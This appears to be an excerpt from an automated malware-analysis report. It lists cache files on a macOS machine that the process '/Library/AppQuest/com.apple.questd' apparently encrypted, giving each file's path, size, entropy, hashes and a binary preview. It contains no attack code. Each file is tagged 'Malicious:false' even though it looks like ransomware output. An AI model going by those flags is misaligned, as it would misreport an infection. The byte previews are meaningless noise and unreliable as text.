                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: /.`...+.^...J...s|JC9q..$-.h..g.(.(}?U.q`..'t ..!Q..U....E......-......\....J....k.Q.u..Bn.~........&...6..`..w...-........-5j...{.r..v..........o...>..3FX..$9...+.$...$.n...{vl..S.......,..:....NK....2....^kE).>.9O......P..f.....^{....{.6......?n......[.OT./.......4..e......@i%.:......D...[?.VK.y...@..E..*....k..q.........^....'...NEO...L......hDdq.?\......{........v....~1.0.S-{.g..?.<.ll.x.daNT1.b.u...y.]g.z\...Z.....-...........R...{..%w................R..........j...i......<.^...Q:..M-./....E(..8.5..b.%...j...b.3.8..~.........3Hz.p.\^{...#Rox,.X.F./>.1)....=.............. ..&...}...*..8d...,l#Q}W@...+>d.....52.V....k...}.*..f..}.._.%a.jZ`....I.@.})>7J......0?.c.uLH(..}.`f....j)1I*..`%\..\7b...v.".@\3rb.....<....x.x.s;...U...2`..?.j...Q?....>......\=.3....A.\b..?.[K3..A*....7.O........<...7.....).....iC....=...F.........f...`uut..N.r/.R.NTWd......J..M.4#tl.b..p.......C..^...o.U%...x_...l...}h..E.o?.....P.........C.!.!.a.....4E._.A..G.5.Op.B..GA.8*.nC.n.2+...].k+9.b.^hc..!..-.......t
                                                                                                    /Users/ben/Library/Caches/com.apple.helpd/SDMHelpData/AppleExtra/English/HelpSDMIndexFile/.com.apple.iCal.help.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):19843
                                                                                                    Entropy (8bit):7.983994695560168
                                                                                                    Encrypted:false
                                                                                                    MD5:FE28A26270A0589AA61295F573604B5A
                                                                                                    SHA1:57E60E99658DAB632DFF89FCB4CFF9D933671C50
                                                                                                    SHA-256:BAB7A3D143EE80FC931CFDE970298AF79A2E700D4089160D688249F2209BEEDD
                                                                                                    SHA-512:147CC273333B2468A07BF0AEF7245A576355DF42828C418E859F19BF42CA55FB704A4C9040A446F8A463CA69329476096153D9BA7577949D171EC9DFB6B73CF3
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: /.`...+.^...J...s|JC9q..$-.h..g.(.(}?U.q`..'t ..!Q..U....E......-......\....J....k.Q.u..Bn.~........&...6..`..w..b.\....'?..<..f.{.r..v..........&d.....3>.e@.I[..c..A.........w...+.c'3....L.a......t...Do.u.5..z.W.I[t...u..w..MJ.........X.C>EA.$3F....3mR..!.8;.m..0....k......0ZF...g.-..N.w..9.... ...S.VL....t.P[...5.._....Q.\$&...%.rS.....Rr.x.Q{..}.cD.T.Ro.t...S.m%.X,..M.4.......f..~......f..J...Y...Wa. -.......Z#..y..,.3%.......fM....{....R..n.r{'.....c..,!9.*D.....F._y....Y.m."......[.#..b..&m4..@.....7.=..E.Y._........{.....[.x....vk......".EH.i..m.$mi.....9m.Q..<..~...[>fu\.....L.6e.L*.#?......Lx.\..b.t.r...):X.A..+$.,I..n 65J......N.1..~..2.=0/m1}....p...Kq.N......\k....S.f..J.D.......pq......J......Oh..8..P..9..S;...^...ljr.o^q..}[.....J.%.D.X..F}-...>..sJ3....X..v..F.*......8.>..m.[...h......zu...........J...5....Y|....B#Q..oq.+..hj..m..J#....CWr<..%.GH..vM.%..#..P_.6.<...j7..-Q.5..s..>......P..;....N..!.3T..nQv....J..D.T..q..kr$B.j.....O...r..}Lj.J..93-....K9P.......".`A.[....)
                                                                                                    /Users/ben/Library/Caches/com.apple.helpd/SDMHelpData/AppleExtra/English/HelpSDMIndexFile/.com.apple.iChat.help.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):18907
                                                                                                    Entropy (8bit):7.98255385667812
                                                                                                    Encrypted:false
                                                                                                    MD5:634875CC10073DE4838CD611B2FD6C02
                                                                                                    SHA1:C5484E55EEF0A75359264E8A09F25FBF83072744
                                                                                                    SHA-256:7831904F12E4AEE5C1E9D33A795AAE139EB1A629C9FC65A107AE1521A1758E94
                                                                                                    SHA-512:0A7968E48720A84C16A78B40DC1FED3CB5006274B6A43571031C35955E2A2FF5A33622D0914CE62BFDA3CBEF047E377E32541B42D44D3394A63ACF210BA42A55
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: /.`...+.^...J...s|JC9q..$-.h..g.(.(}?U.q`..'t ..!Q..U....E......-......\....J....k.Q.u..Bn.~........&...6..`..w......n.hI...8....{.r..v..........nm..4.....1+F.A..&...V_..~....1........N..#/........y.X.....4+.....3u......_4...A.a.....V.....O.sV...h#0...p-...|1...j|x......L....-.IQ7RP1.....m......|4 _.XJ}.hR...s...zc............}.....K..........q......=d.FmN...I.M2. .87...cB........+..`...O%..b.....S.k..... .g...E....)...o,Dh./v........v.........}..r..'G.IOuo.B.1MBx...V.;.V.....W.....|.vC.........2.Q:s..^-|.)v...A...re.'5.k.c.'wH......k,.4.,t[*n....~...I.D.f.FD.i..U`4P.3.........Q....Z..{.'..W. .q.ab....Q.F.Vi.....A.@S......{....L...O......4.`.@.ev/t.Bq#.....k....)..4.f...`.5..Yn.f......!j..>Pv...M.............h.~..|j...u.ol..yK..;.,..w......^lZ2Cy...r.U\6..Ey1.Ip.d.E......}I..B#.[G...QCmP.&F._+...q9...y...H..."......q^w...V.X.... H.^...T..U..,d...^;..a.2....f..,<...vQ...M.OM.D...S..w....&..Ip.^%S..U@.UV..^......L..<.|......._.@+\....@s.L.FE..,.J.s......)YF{...1)Y..EU.>@%A....._.........
                                                                                                    /Users/ben/Library/Caches/com.apple.helpd/SDMHelpData/AppleExtra/English/HelpSDMIndexFile/.com.apple.iTunes.help.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):58149
                                                                                                    Entropy (8bit):7.996027846622638
                                                                                                    Encrypted:true
                                                                                                    MD5:B862B28DB5E51582942A6185B5549AB3
                                                                                                    SHA1:DFD7FC92FAA3091D484C3AFABC50CB23588B8FA5
                                                                                                    SHA-256:398235EBB034E309F74189B73C44D5367087ED457AD81D55A383E4BFCFD9E522
                                                                                                    SHA-512:289CC5922569F6DF39CB888F3799291494CC4C3F4B661AB1B8CC7B4D8DED2165A5DC09CA9099CD3E75B85736722CAB095063AE8203C13CF9A528EE3AE6743565
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: /.`...+.^...J...s|JC9q..$-.h..g.(.(}?U.q`..'t ..!Q..U....E......-......\....J....k.Q.u..Bn.~........&...6..`..w....]p...o.q.w-T.O..VDG<..L.....{.{q..Mf.....b..q.9.o..h$.9.o..h$.9.o..h$W..ps.&3......U5...Hq..U..$..A}.3be....}up........0.;*.b.c6.L.7....K.d.....)...sscY9......t.`.0:.$...X....'..~....h..Q>....8.V.../....D9.....p0.^._7Z..@...\e.....Og..<......,.E^..21b.c.e..B^..:.#.y..;....0K...0\.Y.K.;ci].M.$....r?......*d..RE....-.._h.".....R....B).....&.).5D.80e9..<E..@.*..."...{..W.ac:.uJ.O.|3.*W!eJh.8.K.........d...8Q..P./........x.8...6....83.p.2O.a.].&..\CG..R.g...D.....q.'j...}.>.R...=1.W!...mA...I.}.=..l.x......9V.Y....'Q.'f.......7.F+.........................8.P..z ?yY...........0C.~.[w|.2Ws...q...}*+h.wm..\1....oQ.....<.cx.r.#.i......e.W.....B........lk?.q..!8S.dx..En......8...t.......K......N...tmQ...7.s.`.$.....9...D...K.-.9...-&..Z.......S. Y.LXE..w+.....................4e..D....K...,1]....TM...z...%...ez"......\.H-!:E.x..).].....6...~..Y....T.T...a[...W..L-..V......8.pc...?.3
                                                                                                    /Users/ben/Library/Caches/com.apple.helpd/SDMHelpData/AppleExtra/English/HelpSDMIndexFile/.com.apple.machelp.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):242672
                                                                                                    Entropy (8bit):7.999173933051666
                                                                                                    Encrypted:true
                                                                                                    MD5:8CC12057DFA8FFFB0FBB0F99C89F0918
                                                                                                    SHA1:BF603729E2BBB5FF564A413724E8ACF2C6C7ABB6
                                                                                                    SHA-256:14ADD648CB7A1D919FAE2462B176C0D38B64D576CF8724AD2AFD590F1A58585B
                                                                                                    SHA-512:B4F306EBB22D20D4B4A2CCC9A8BC6454C1A19DFFE9E10DC6E4AA6050D342E921901A7E4673F0DC34BAEAC1E8D433AFB2B42621A72BA9920D12B2D16C1954123E
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: /.`...+.^...J...s|JC9q..$-.h..g.(.(}?U.q`..'t ..!Q..U....E......-......\....J....k.Q.u..Bn.~........&...6..`..w..z.=..-{uP.......|AH.E$.....1..&........ya,...k`.9.o..h$.9.o..h$.C>..1&..".....t.{.g.....i.../h..!......B...........).........$G...cY...y....t3..~..p>yi......Tb....`. .q...;}(....^....9N..;.JT....EZ.J.....T..r...mD`d..1....Y...|x.u.G.m>".....7p.Q.<.....,......o-...>A...j....].o.Hw...................W.2.....".W.<a.-2k. ...0.s.Ekv&;x.u......2...B..1.....v.....z.N.....*D.....|...x.w6JGh..wT.IG....r..[?..$...U..nx..!............0.V.Z.R........7.X.gF-..C.V..C..b.8".0G.|..j...v+.2..>..............}........{.3==O..b.....C;..........*...{..c.{...5...0.?......U..|...y.h....E....&...w.h;5d...|.G.g`M0[j...fC........=.............H}..l6.X&.R......1..F..o.n<..6.._..k..{VU.(....^........Y....K)lV.aK...J......%..!...*V.*.....rF^'.......*l..,........K...=...3"......@.V....vy|....4.......ft=.j.].am.i..Pd^S.C~X&c.M.......C...I.h...H.i.H...t:....Ms.P+.5.v..y..d...U...n=.6c.p.]3V%.....r..5.z....
                                                                                                    /Users/ben/Library/Caches/com.apple.helpd/SDMHelpData/AppleExtra/English/HelpSDMIndexFile/.com.apple.reminders.help.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):7650
                                                                                                    Entropy (8bit):7.942218935775686
                                                                                                    Encrypted:false
                                                                                                    MD5:1FE3D72C3010C1EC4B82E42130C3E6EC
                                                                                                    SHA1:C07F1B5AC8DBA76F7AA5D6760FD927A1AE003985
                                                                                                    SHA-256:1BDE334E1185804C99483A811F0938C013AB46BB7515C2D53A469C82A26B9010
                                                                                                    SHA-512:9321C434F4413C36A2DA051D725DF4AB23E228D7DB0D68FDC9513BA5DEC99B731900EB35B85040B6A975609FF3684EC8C28E573B99190587D0589C183E67C5EB
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: /.`...+.^...J...s|JC9q..$-.h..g.(.(}?U.q`..'t ..!Q..U....E......-......\....J....k.Q.u..Bn.~........&...6..`..w..:.`#....U...[..c._j.]$...;!..5.u\.................&......4y.:>.4.C.....)...J..rA......Q...7.td...........U(.CN.v.E.8..C?.yrX...1.&..6?....+..>s!.U..F..ob.~.G....Z.Bz-...........,...:.G ..G.E\.....c\.N.zvx.@.F.....w!q...@.....y..'...............H5e>5......X...(.........n.1....1....P.@.y....|..e'...zc.].....29....|...w.....f.r..r.lY+........W.W?..yV.....B.p.)..P.w.`..@.J..`.....Y7.<J.....m+...3...|..G.}..y...E.8.p.G.+..#..2...)L.J..-...Y.v.A.#)g7.....s.h..u....K(K.......y...z..%K....*..,.?"...q.H7^.V..4...B.Q@..YDuf~,?<w...e....Ma.N..h.........\....N.....9...._.swa...L.{.Fu }.>.....4...*...a...fo..@'?U.?.GK..$.........6..d)3..^-.....E...@...".(d..R.+...Q.U.[D.8U...N....g.._.. .y.Q.....{4......D.+*.L.....4O.z.@.....k.x....&jw.S.%....]~....q.)....!....V.x..e&........u...k.Jq..?e.j......F%.#.........s....z.....se.p.ULr1....!..E. ...'...3..f...;..cr.m...K.c.g.....i1..w.xvL+.....=.
                                                                                                    /Users/ben/Library/Caches/com.apple.helpd/SDMHelpData/AppleMain/English/.fileAttributes-shm.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):33091
                                                                                                    Entropy (8bit):3.4348966494497977
                                                                                                    Encrypted:false
                                                                                                    MD5:4025253EB51E9813DEDAE63CEC3C5183
                                                                                                    SHA1:67302BF62FB1876C422C05629F92BFE96303C1E1
                                                                                                    SHA-256:89A02CBBD5C9176FF96DBA9B859DA59E4EBC57179E3F99823FA32AABF0241349
                                                                                                    SHA-512:D76A0D6D44F455CADFF80EB0FEFA91653EBED19CD9DF0B8F5B298B15AD5626560068B24D01850B173658C5065706AD7EC45997F2AE8E11DBA9D27DE01C73A849
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: >.k....Lm..........3~......'.}.&....h.<ov.w2n..U>.k....Lm..........3~......'.}.&:....)..v.w2n..U..........AoR.r@.9.o..h$................R...@+{..y.H.....g..gm,._.Y..<.!.......0!8..A....?.......y.H.....g..gm,._.Y..<.!.,...u....&..@.....0.`6.....n2....(.w...\.[O.j.!W.m.^e..,..=-H|R..T.J...Ky....#D.........................................L.D<.+..........................................................................................................................................................................................................................................................L.D<.+..........................................................................................................................................................................................................................................................L.D<.+.................................................................................................................................................
                                                                                                    /Users/ben/Library/Caches/com.apple.helpd/SDMHelpData/AppleMain/English/.fileAttributes-wal.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):165236
                                                                                                    Entropy (8bit):6.549943144140046
                                                                                                    Encrypted:false
                                                                                                    MD5:20EE03C03499A78FD693BAE840CD85BD
                                                                                                    SHA1:5E81A142B42A68D3313FFF31EF2411B7C9EFDBDC
                                                                                                    SHA-256:065036F8093DCE1F0B4434C3FE98FEC93CCDDEAC242C0E7B15AF1A4B8D62BF21
                                                                                                    SHA-512:400324858EFEAE1CFBEE8D0F15FD589BEE30A5AAA45BDAA1D789ABC114FED821D64A051862DC649856D717E4D151C86F876BDEA7CC820B0F3FB2A4334D4ACEB0
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: @....[...L.-$.......h.<o..;....-.bz.Hy.P....h.<o.`|......#.1rS..a....lT........tO$d.....................{...#Rox........t...7.........................]!../.G.....%....+.........................................................................................................................................................................L.D<.+..........................................................................................................................................................................................................................................................L.D<.+..........................................................................................................................................................................................................................................................L.D<.+.................................................................................................................................................
                                                                                                    /Users/ben/Library/Caches/com.apple.helpd/SDMHelpData/AppleMain/English/.fileAttributes.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):4410
                                                                                                    Entropy (8bit):3.74539163788301
                                                                                                    Encrypted:false
                                                                                                    MD5:F972E56AEB1743B60A305C3E2A171212
                                                                                                    SHA1:0D5552A6C93349EE212C196D2A6A35AEE9AF1A40
                                                                                                    SHA-256:92FF1EC0FB700DB1881D2DCBA6D0A0BC734B27530BCBA1A74BA7C6D28A68114F
                                                                                                    SHA-512:CB541136B85F5AD1233FDE35930FCA50C8C58E924640C5CF3E303B36F849CDB551D9584C4CC26EF845BDEA5FDDB3EB346B5D06A68DE229A35801ACB8770C2BB2
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: .#.1rS..a....lT........tp.v...})................{...#Rox........t...7............L.D<.+.%R4,....../.G.....%....+.................................................................................................................................................................................................................................L.D<.+..........................................................................................................................................................................................................................................................L.D<.+..........................................................................................................................................................................................................................................................L.D<.+.................................................................................................................................................
                                                                                                    /Users/ben/Library/Caches/com.apple.helpd/SDMHelpData/AppleMain/English/.lsm_map.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):18526208
                                                                                                    Entropy (8bit):7.999965350104985
                                                                                                    Encrypted:true
                                                                                                    MD5:C3ADC36EC53F75C879D2446A0FF30748
                                                                                                    SHA1:CE5E025510DF8864AF7A1CC5BFF2E45D74B511E2
                                                                                                    SHA-256:E2217F66A2C2712843D05F991A9A7CEB03FD2E6E81B4C48DC3BE9824FE536371
                                                                                                    SHA-512:03144AE6A8E752BC6D41A18CD46CA3DD58994D06B7559FD69B5CD76987AF032258786C3C6FE805BC2E805AF4DEB1E104F944DB3DD285F87F9A133785C2622897
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: YP~.o......u.8.Y..9........#......}PmZ.C....n..Yj.....n.......C...m.......DV.R..$.8x6M..f.........7.?P..8H....d..S...Y.........C.....u4..t.^j..OYRQ..d.......9.hp+.l.............5.....S<|o.M...:.........=...q......1~...HR4LdjR..t...6........us(...A*..RyhO...BU.....f....^...jG....].....R.JT*D.).y..?...a.,..N....u#....sNL"._..Q...{...]..2.).*....4.......v..`w...Yue......`.....e.\l...e...l..bF.....C.....n.R....u....&.........9@.U.......yC.........b#!.l.C...L.!N..|B......\.|.[......;.I.&1EK.s..BmuF...nW,...(X.....-m.r......f....T.3.qv....j..._ylx.0..=........._xc....M.9.0..k.....h>i.."...m..Ce..)q....Z.i12.O@.o`.xEV.......^....1[.l...[..G.p...#`.^..@.....=.%B*...........P...D....f..'].Ybf..#H............%..ec..r..'.....r.a..6....).7W.....,..d..L2.$... |=.....u%...'.G...H..r........p...s.....{....._.b..B.'..,|...>.Q .sb.s..r3.~q.U...?T.|;.........\.\.k^fp.j.zR....nZG.bl.UZ.dn..i.MK..^Z..+M........A....>.c.n..l.A..D..@L$.......n.7..y...>.]......AyY*.-......Y'........#}.......2...U.V..P.gF@...
                                                                                                    /Users/ben/Library/Caches/com.apple.helpd/SDMHelpData/AppleMain/English/.suggestions.plist.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):119129
                                                                                                    Entropy (8bit):7.997135598805771
                                                                                                    Encrypted:true
                                                                                                    MD5:5B686C516564B532147F07076CCAC456
                                                                                                    SHA1:B85F0654E1AE264F871F441286A3BB9C991C3BEC
                                                                                                    SHA-256:27431048174765BC14BC0499D116879C768223AE8FFD8D9C7DCEEA250E3A880D
                                                                                                    SHA-512:6617A3031D1CBA9A02E86E09CD1F944504F16A86894AA1452B7EA469A857C2926886C426E76F4FC3AF791241C3C2396935F07661EE384507B771F10564382A96
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: ..@.7R.......Y.....0$u..dk..+t...]..0[..R..*2....$?.r.A..E..:pE.!.M.....eP...<....,.rkuD ..rb.."....66#4cM....}Kf....4.....u:....0..L.k~..5d.)Zex..H..#......:.G.....*{.3.. `... ..rb.." ..rb.." ..rb.."...~q...'..!&4$.zddQ...._\.[....@.]+)^.e.3.;.Yl8..Z(..j.I..{...7......e...9.s9.48...~..(6[...d.NI.5............. ..rb..".....}.G}.....X.Y..w.t...n.P.i.......[y. ..rb.."BD2>.a.5.........Q{.]..A....[...........j.d.8.....".9..]......t.'qp+-..f......E....,.8_...S_..............#.or......Yh..P..mQ.....^2...#l......I ..rb.."}|y....6..d.....-....(e.z..j."....{.....N-.*..ONf.9@o5..(J.'YQX..f.~......^.........-.5^..'.b(M..]..k."f...._m....4....x<...".nE..c}._..H/.|p.b....qI>:.#.G.$1.;"jI.I7=P.W.h...+......^........z.....V...,z.3Fz*.......QGy..g..A@.'...|[9=...*..........&.P..t..}|y....6.q..............+....}N.{..(.8..a..6......}I.H0...Vd.F2.(...V....._2...j..SY".....O`J......;C..ka0_r./.l......Dq...u:...v(...`..v..Q\N_..9.....kAb/..zn.@.>j{.+......3P.`.R1..c.$...z0.{.....:.G.\....[....oy....6j..tG.
                                                                                                    /Users/ben/Library/Caches/com.apple.helpd/SDMHelpData/AppleMain/English/HelpSDMIndexFile/.com.apple.machelp.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):237376
                                                                                                    Entropy (8bit):7.999119061255259
                                                                                                    Encrypted:true
                                                                                                    MD5:281AB928556AA1CBEAE45093FA30BE0A
                                                                                                    SHA1:951CE75CD55D9788A912DE646F968ED0B4779231
                                                                                                    SHA-256:E71F8D8253AB8B621F5F7A40B593678A2D5F4F20329612217584E689CCD5AF11
                                                                                                    SHA-512:1F30DC4C8AE8B610F2A7671131BC25749CF3B309EC9CEF0E8DDD3CF3969E6513C1F6796916DFFFAE653ECF9627CFD727D98BC1B1EFBBA4C976D831C3B24DB1F4
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: /.`...+.^...J...s|JC9q..$-.h..g.(.(}?U.q`..'t ..!Q..U....E......-......\....J....k.Q.u..Bn.~........&...6..`..w...Z./.]x......`......5{J....1..&....:,..sq.......9.o..h$.9.o..h$.9.o..h$`."...O.r.........6..h....C..{@.~./..efrn...z.....e.B.......V....H....iB5.,..6(.....].3.....b .Q.o....o..P:..a....7D.....|.d........y8..T..u.66W...f.+.8.#.......}.>?%/........K..(:pT.ol..Z4d.u.......S....I?.m..-..:|..).gT..nv.....v.G.#%.H}......{[...aF.o...6`.uT..}kL^..i..C...X2K....@.0..Z.....l...^..P..N...cq........G.^7....#.;:.....jKV....f*...g.8cl..d~/......G.....7|..........%O.i......L..{....P.4S........[.$J...'...^....hUs.....%......c|.R........Z..._^..y.';...l..(.H....O4.fT.|............,R-....a.-..>.6.h..N..W....d.S...t.|.0..L...m..Q..n.LUT._.vX......2...m..F,5X).so+...J......t..........1..W.=&...0a..z....T.^7.^P...T[........'.b..h:......7IY..3v.EAb.H..y.e.'xP.dL..1......-3.......`...-e\.......J.......uZ.j&.......^Qx.......{...H....!...F..".#......+.1...sm...k...#y...h..b.x.x.....!o.N.{.~.....&...
                                                                                                    /Users/ben/Library/Caches/com.apple.helpd/SDMHelpData/AppleMain/English/lsm_map
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):26029
                                                                                                    Entropy (8bit):7.987730091905988
                                                                                                    Encrypted:false
                                                                                                    MD5:DE880B4509A9D5A139C8DF7A3F337EAE
                                                                                                    SHA1:48DE3B031651B09B4361454F65E416133C4C02A7
                                                                                                    SHA-256:C8A48CAFF19783D565CFB6AA84932F99D204BE865028B540510E36685662939B
                                                                                                    SHA-512:50C606F66829CB98F9CF95E04835688C7A384FC23D774F7AB7AE979A1AB9B1C817576315CA6FB0398421D0F5845E17F00952F20BACB1504F9B7C2F40A20CB1A4
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: !j...m..m.v.:.....xhs .u......j.m.(.(.E..C.0..ZU..z.l*.-.J..Ys~...Ev.?,.e..4.....[.........]..A...M.=...`!....8...w.Aa.56j....]....[;.......c...Q.*-....n?X......OM.3S....8.8...A.E"..G0.w...<@...Q*.@.pU..m..I.T..... .IZ......w...Y#U...>.]t/U^...Fr..$............(u......f.;......<.%......$0.n2.9Z..P-.1.3.......da:+1.....D...=[.5GH..@.}.VnN.S."#V.....#W.Ke8.V...i....Ul(^t.#4wb._+R..@.o".2..^f.....gF8.T.C...Yg.oy;...BT..i...{/5J....|G..j.;.'..........Ep..?.H..'..!.......=..jY.|..E.{..W...P...U.S..p....a...\.Tc@IG.......3..)..ch...S6........+)G.H .c"..HA..pY............r..d.R.\..r%....3..d.V.{.G@.......^..........~z.d.../...C.....M...{8>....G.iv..)...P_.....F...e.A.J;.k..g.0~..Sv4..pBQ-..Ck..a./.7u.5.....-...!c#.p..HZ`.X.....Yg.>..[....X......B.....h\.!.....s..+`..t.4~.....o;y..Q./.d....3..,a..X....b...0.?..H!..e.........#`..Z^_..U.w#..O..5/.JQ.....y..^). .cE5aR5...&.yH.=...`...........:;.......u.|.-f.&....J....4.K>..m.....Zc.G...Z..l]?.c....}[.....m.d.~..o{m..:..gvm=........QQ....w....!n.D
                                                                                                    /Users/ben/Library/Caches/com.apple.helpd/SDMHelpData/Other/English/.fileAttributes-shm.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):33091
                                                                                                    Entropy (8bit):3.3906734962690406
                                                                                                    Encrypted:false
                                                                                                    MD5:2094BEC30647151C1D3669FA64E074F1
                                                                                                    SHA1:08866A8C49DD627E125535F7B919E2CF1B392434
                                                                                                    SHA-256:79F1082FBD9098E042A4DAA63990670911DD04C41C0F82DBE87F2A9B474F7869
                                                                                                    SHA-512:995D66986F8E9F13216A5D422EC7217F221A877396BCACDED9A5D77F728C01A64A978B9345970D860074C4AC08B65971FB871EAA04C8D79FD31CC2B72BB81F29
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: >.k....Lm.......9G.2..t...q...%#..7.vt.}.....AgK>.k....Lm.......9G.2..t...q...%#u.g.jl.j.....AgK.........\.O.....9.o..h$................R...@+{..y.H.....g..gm,._.Y..<.!.......0!8..A....?.......y.H.....g..gm,._.Y..<.!.,...u....&..@.....0.`6.....n2..&.aL6....................................................................................L.D<.+..........................................................................................................................................................................................................................................................L.D<.+..........................................................................................................................................................................................................................................................L.D<.+.................................................................................................................................................
                                                                                                    /Users/ben/Library/Caches/com.apple.helpd/SDMHelpData/Other/English/.fileAttributes-wal.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):119889
                                                                                                    Entropy (8bit):5.989907106496307
                                                                                                    Encrypted:false
                                                                                                    MD5:55532A078A50FFB6527D80E9D16D7B70
                                                                                                    SHA1:41D8E3B6F4AD616F6F380640A5BF7B453DAF35F6
                                                                                                    SHA-256:721C2390930B32BDD1AE380D631104861D9C0D2701DC17907172136AD4E7CC56
                                                                                                    SHA-512:E2345D9B54D272054691CB5ADC6E225BA0B53377CBAF6E2050948053B8FE9BCC8C472CC394602EC1F69DC983E4E4FEFE2D92DE8BA23FA6BABBEBCB965F55F76D
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: @....[...L.-$.....7.vt.}..w......bz.Hy.P..7.vt.}....v.6..#.1rS..a....lT........tO$d.....................{...#Rox........t...7.........................]!../.G.....%....+.........................................................................................................................................................................L.D<.+..........................................................................................................................................................................................................................................................L.D<.+..........................................................................................................................................................................................................................................................L.D<.+.................................................................................................................................................
                                                                                                    /Users/ben/Library/Caches/com.apple.helpd/SDMHelpData/Other/English/.fileAttributes.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):4410
                                                                                                    Entropy (8bit):3.74539163788301
                                                                                                    Encrypted:false
                                                                                                    MD5:F972E56AEB1743B60A305C3E2A171212
                                                                                                    SHA1:0D5552A6C93349EE212C196D2A6A35AEE9AF1A40
                                                                                                    SHA-256:92FF1EC0FB700DB1881D2DCBA6D0A0BC734B27530BCBA1A74BA7C6D28A68114F
                                                                                                    SHA-512:CB541136B85F5AD1233FDE35930FCA50C8C58E924640C5CF3E303B36F849CDB551D9584C4CC26EF845BDEA5FDDB3EB346B5D06A68DE229A35801ACB8770C2BB2
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: .#.1rS..a....lT........tp.v...})................{...#Rox........t...7............L.D<.+.%R4,....../.G.....%....+.................................................................................................................................................................................................................................L.D<.+..........................................................................................................................................................................................................................................................L.D<.+..........................................................................................................................................................................................................................................................L.D<.+.................................................................................................................................................
                                                                                                    /Users/ben/Library/Caches/com.apple.helpd/SDMHelpData/Other/English/.lsm_map.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):27574272
                                                                                                    Entropy (8bit):7.999976244114021
                                                                                                    Encrypted:true
                                                                                                    MD5:5D61F78217771281614B5DD22E5D2CFA
                                                                                                    SHA1:E68776A5C6E1921A987B9C634F6EBD4F29DF6C7E
                                                                                                    SHA-256:4AB96103D586804665FDCCC42F5081AA99F112991036B20E17752CBEBADC4D47
                                                                                                    SHA-512:6CA98B2FA8DEE1A7CB5DE9273A1A6E69C17CD9A5CADF1B693604E3BE11AB68C453F9829308BDEBD592FAF2DE14E15ABBFAE960A1C3364BEB94B40319F8700A11
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: YP~.o....."'..8...9........#......}PmZ.C....n..Yj.....n.......C...m.......DV.R..$.8x6M..f.........7.?P..8H....d..S...Y.........C.....u4..t.^j..OYRQ..d.......9.hp+.l.............5.....S<|o.M...:.........=...q......1~...HR4LdjR..t...6........us(...A*..RyhO...BU.....f....^...jG....].....R.JT*D.).y..?...a.,..N....u#....sNL"._..Q...{...]..2.).*....4.......v..`w...Yue......`.....e.\l...e...l..bF.....C.....n.R....u....&.........9@.U.......yC.........b#!.l.C...L.!N..|.i..I......V...oj.&..NF.&\.,...Dd.....B.v..hE.mU..6.....W...n..'U..@`.r.y...?..Y|uhT.0F...55.......y...C..-an|....?.....L..G..w.D..|WpIB\..H....x.}q1IS5<..Z..N./.P.....~.....d.E.d...........~RO.......\...?........*KB..U.8.... ...'..VC.S..7..==..".qq....q.n.....M......6!...k.......q.1,..Z.ul.a.....z..I.'f[.(..M.B.N...k....5...........L]..\....<.&.2...J..r ......I.E.*r....0M..4...#..".....##.T..%.,.8....!.e. ......7..6.n.p.V.EI..UB&...>.......Ho......).....$...n'vR.mm....qr..F-...G.Ei.a....>i.j.K........oI.e..5BQ-^'.@.2.....>i-=.X..
                                                                                                    /Users/ben/Library/Caches/com.apple.helpd/SDMHelpData/Other/English/.suggestions.plist.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):171404
                                                                                                    Entropy (8bit):7.998373569429849
                                                                                                    Encrypted:true
                                                                                                    MD5:073C54E3E367231BC1B227B54A5AC3AC
                                                                                                    SHA1:5C3477EBB2EE2B04AF58CF5FBFA2718EF0EE927F
